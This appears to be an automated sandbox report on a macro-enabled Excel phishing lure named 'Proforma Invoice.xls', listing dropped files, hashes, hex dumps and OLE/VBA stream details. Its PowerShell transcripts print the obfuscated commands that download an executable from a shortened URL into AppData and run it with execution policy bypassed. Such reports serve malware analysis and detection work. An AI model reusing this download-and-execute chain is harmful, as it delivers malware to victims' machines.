                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Nov 19 17:04:17 2020, atime=Thu Nov 19 17:04:17 2020, length=8192, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):904
                                                                                                                                            Entropy (8bit):4.6219904722378455
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8QO2tCXUyuElPCH2AxTpbFiYP8jsF+WrjAZ/2bDYeLC5Lu4t2Y+xIBjKZm:8QhtlxVbFzTAZiDC87aB6m
                                                                                                                                            MD5:7EC36BE39E11913C1072FB0E229EBA18
                                                                                                                                            SHA1:6F34ECE8BB3681EC6863EB87A90E6EB3A090CC2B
                                                                                                                                            SHA-256:0FC6D55651CE9B8904669720A5F206F6FCDB7821053A039DB5348167C94CC193
                                                                                                                                            SHA-512:DF2596255436129B30CBD269D0E45972369E83ED75253F7EE6490891D1AAFA889F7514881C9DD25A751C3429937D282780759ED046117DEA08EB0B3DFEA79C37
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: L..................F........N....-.....e....<'.e..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQx.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.sQx......S....................7.2.h.a.r.d.z.....~.1.....sQ....Desktop.h.......Ny.sQ.......Y..............>......d..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......581804...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma Invoice.xls.LNK
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Thu Nov 19 17:04:17 2020, atime=Thu Nov 19 17:04:17 2020, length=80896, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2170
                                                                                                                                            Entropy (8bit):4.7030863853110985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:82xVbFcWsFt1Aojg6tdDMi7aB6my2xVbFcWsFt1Aojg6tdDMi7aB6m:8kFZSteoj5t+zB6pkFZSteoj5t+zB6
                                                                                                                                            MD5:F24AA8F4544598390C432FB58270FE7B
                                                                                                                                            SHA1:6AFCADA51E56B4C0E475710249D9097B7D452EED
                                                                                                                                            SHA-256:A7933D4111C49361075E237526A8ECC27908A5C1DA775CB34A945E50876ACAC4
                                                                                                                                            SHA-512:354B7D2E2E94AC751548F8836B77EA004943DBB3FCCE417462B19DC7C99B81B843FAC377C8DE81B7241EA38A604111855FC4E3133C188C51EAA2208BC78E4B57
                                                                                                                                            Malicious:true
                                                                                                                                            Preview: L..................F.... .......:...<'.e.......f.....<...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQx.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.sQx......S....................7.2.h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.sQx......Y..............>....... .D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.....sQ.. .PROFOR~1.XLS..Z......>QvxsQ......h.........................P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\Proforma Invoice.xls..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.........:..,.LB.)...As...`.......X.......581804...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):113
                                                                                                                                            Entropy (8bit):4.716833640370117
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:oyBVomMQDMILGMXp1taQILGMXp1mMQDMILGMXp1v:dj6GKgBafKgPGKgL
                                                                                                                                            MD5:2C06916EAD99D0511880A6240B912B1D
                                                                                                                                            SHA1:E5DFBD0D7F8F28B7289C207205D2B25D1DE98798
                                                                                                                                            SHA-256:5A89C7DB3201F33EF0B673E3C18F053D7BF74497A29E4877FF9337702207B8FC
                                                                                                                                            SHA-512:22739F4073223B02C58FB1A3D0F46BFB0C846B6CDC9A5449200C83D0EA7DFC49BB7CCBE278AB0744706540F731D69FB64BF3F5D5EF1F51D3430B43CDFCFFB219
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: Desktop.LNK=0..[xls]..Proforma Invoice.xls.LNK=0..Proforma Invoice.xls.LNK=0..[xls]..Proforma Invoice.xls.LNK=0..
                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.581804.SgatlcVc.20201119100423.txt
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3478
                                                                                                                                            Entropy (8bit):5.273117445548069
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BZKhiNP3qDo1ZLZDhiNP3qDo1Z3qzvAzuazuaz+UZ+:50Avkuuuu+r
                                                                                                                                            MD5:970B8571A505AD9FE4D16302EDB33A1D
                                                                                                                                            SHA1:A550790EF8BF7E5D1628145AFD3804029D51FE85
                                                                                                                                            SHA-256:EF2B29C449A852320A58012D161BEC520D902BCF4BB4EE4AC49703B82AB61562
                                                                                                                                            SHA-512:D95D048562A951FCA5477DAF44D2222F8B9FB48F62950E7CB441983469B18C76666D5FD2C5809A8C2B663F02C31F168AC8CDC12A99785925B0C9E7AFD805E74A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119100447..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe..Process ID: 6196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119100447..**********************..PS>stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe..**********************..Windows PowerShell transcript start..Start time: 20201119100547..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Applicatio
                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.581804.jfIwIQN1.20201119100422.txt
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3265
                                                                                                                                            Entropy (8bit):5.393768869946091
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BZLhiNXqDo1Z0ZwfhiNXqDo1ZqQYwZwZaZFZuE:udzqqkGE
                                                                                                                                            MD5:18791271DF6BDC2025F1877A888E4301
                                                                                                                                            SHA1:BC0C8AA061FAF0B249ACA4774EC7653CF86FFAB7
                                                                                                                                            SHA-256:5B001FC9730AEBF2D060089FA2503EDE24CE3A689D49F7891F00008A2CAAEF88
                                                                                                                                            SHA-512:E52847EE8ABCCBE95628F77BBE09C2030812E501C32148B7D3F3D658041AF43102E43168FC205D9262BF12B3843E250D53970C8DA9B56440D85BB43A03A1ED28
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119100446..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 20; Move-Item vx.exe -Destination ${enV`:appdata}..Process ID: 4804..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119100446..**********************..PS>stARt`-slE`Ep 20; Move-Item vx.exe -Destination ${enV`:appdata}..**********************..Windows PowerShell transcript start..Start time: 20201119100533..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17
                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.581804.sxhBoU5o.20201119100421.txt
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3291
                                                                                                                                            Entropy (8bit):5.453735252412667
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:BZpvhioOevqDYB1ZNZevhioOevqDYB1ZXJfGO9fGO3fGORZZV:BZlhiN4qDo1ZNZShiN4qDo1ZXJDpDZP
                                                                                                                                            MD5:42C698D1C9F97EADA970FFAC78815433
                                                                                                                                            SHA1:FE167C8DF2EF91061CE1079B3E6D3B14C4EAC905
                                                                                                                                            SHA-256:13562E631E552FEEB7EC894CB91629285DD787C2EA5E12CB55DA6A50ADB2D950
                                                                                                                                            SHA-512:5E44CEF8D61DCF537F4F1E8EE5D033B09984B634A742B213165829517A3AEBED256E1B7C912886EEBE6A273C5A7EC723E1BCBABBCE535E6CF83A1597343D16CF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119100444..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZhqUH1O','vx.exe')..Process ID: 3060..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119100445..**********************..PS>(nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZhqUH1O','vx.exe')..**********************..Windows PowerShell transcript start..Start time: 20201119100520..Username: computer\user..RunAs User: computer\user..Configurati

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dexter MORGAN, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Oct 25 18:24:14 2020, Last Saved Time/Date: Sat Nov 14 12:53:19 2020, Security: 1
                                                                                                                                            Entropy (8bit):6.722113426938609
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                            File name:Proforma Invoice.xls
                                                                                                                                            File size:76288
                                                                                                                                            MD5:55db711144ff4a35faf58d982e7cf727
                                                                                                                                            SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
                                                                                                                                            SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
                                                                                                                                            SHA512:92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
                                                                                                                                            SSDEEP:1536:/pqnSGiysRchNXHfA1MiWhZFGkElMFAAr7IQmSb4wIE7zp0RhBv1hQz7rTb16mL:/4nSGiysRchNXHfA1MiWhZFGkElMFAAv
                                                                                                                                            File Content Preview:........................;...................................z..................................................................................................................................................................................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                            Static OLE Info

                                                                                                                                            General

                                                                                                                                            Document Type:OLE
                                                                                                                                            Number of OLE Files:1

                                                                                                                                            OLE File "Proforma Invoice.xls"

                                                                                                                                            Indicators

                                                                                                                                            Has Summary Info:True
                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                            Encrypted Document:False
                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                            Flash Objects Count:
                                                                                                                                            Contains VBA Macros:True

                                                                                                                                            Summary

                                                                                                                                            Code Page:1252
                                                                                                                                            Author:Dexter MORGAN
                                                                                                                                            Last Saved By:Administrator
                                                                                                                                            Create Time:2020-10-25 18:24:14
                                                                                                                                            Last Saved Time:2020-11-14 12:53:19
                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                            Security:1

                                                                                                                                            Document Summary

                                                                                                                                            Document Code Page:1252
                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                            Company:
                                                                                                                                            Contains Dirty Links:False
                                                                                                                                            Shared Document:False
                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                            Application Version:983040

                                                                                                                                            Streams with VBA

                                                                                                                                            VBA File Name: Feuil1.cls, Stream Size: 977
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                                                                                                            VBA File Name:Feuil1.cls
                                                                                                                                            Stream Size:977
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , S . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c 53 9f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                            VBA Code Keywords

                                                                                                                                            Keyword
                                                                                                                                            VB_Exposed
                                                                                                                                            Attribute
                                                                                                                                            VB_Name
                                                                                                                                            VB_Creatable
                                                                                                                                            VB_PredeclaredId
                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                            VB_Base
                                                                                                                                            VB_Customizable
                                                                                                                                            False
                                                                                                                                            VB_TemplateDerived
                                                                                                                                            VBA Code
                                                                                                                                            VBA File Name: Module1.bas, Stream Size: 1512
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                                                                                                            VBA File Name:Module1.bas
                                                                                                                                            Stream Size:1512
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . P , : u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 16 01 00 03 f0 00 00 00 dc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 42 05 00 00 00 00 00 00 01 00 00 00 50 2c 3a 75 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                            VBA Code Keywords

                                                                                                                                            Keyword
                                                                                                                                            (strMacro)
                                                                                                                                            strMacro
                                                                                                                                            Attribute
                                                                                                                                            auto_open()
                                                                                                                                            VB_Name
                                                                                                                                            String
                                                                                                                                            VBA Code
                                                                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                                                            Stream Size:985
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c c8 2b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                            VBA Code Keywords

                                                                                                                                            Keyword
                                                                                                                                            False
                                                                                                                                            VB_Exposed
                                                                                                                                            Attribute
                                                                                                                                            VB_Name
                                                                                                                                            VB_Creatable
                                                                                                                                            "ThisWorkbook"
                                                                                                                                            VB_PredeclaredId
                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                            VB_Base
                                                                                                                                            VB_Customizable
                                                                                                                                            VB_TemplateDerived
                                                                                                                                            VBA Code

                                                                                                                                            Streams

                                                                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                            General
                                                                                                                                            Stream Path:\x1CompObj
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:115
                                                                                                                                            Entropy:4.26356656053
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . F e u i l l e d e c a l c u l M i c r o s o f t E x c e l . 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 46 65 75 69 6c 6c 65 20 64 65 20 63 61 6c 63 75 6c 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c a0 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:296
                                                                                                                                            Entropy:3.12351939639
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ac 00 00 00
                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:224
                                                                                                                                            Entropy:3.82752718687
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . W . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0e 00 00 00
                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61163
                                                                                                                                            General
                                                                                                                                            Stream Path:Workbook
                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                            Stream Size:61163
                                                                                                                                            Entropy:7.20561555755
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . U s e r n i s t r a t o r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . B T . . 8 . . . . . . . X
                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 55 73 65 72 6e 69 73 74 72 61 74 6f 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Stream Size:533
                                                                                                                                            Entropy:5.2193098334
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D E D C 7 2 1 D 9 2 2 7 2 3 2 B 2 3 2 B 2 7 2 F 2 7 2 F " . . D P B = " 7 3 7 1 D F 8 8
                                                                                                                                            Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:86
                                                                                                                                            Entropy:3.21559847503
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2607
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:2607
                                                                                                                                            Entropy:4.00233365281
                                                                                                                                            Base64 Encoded:False
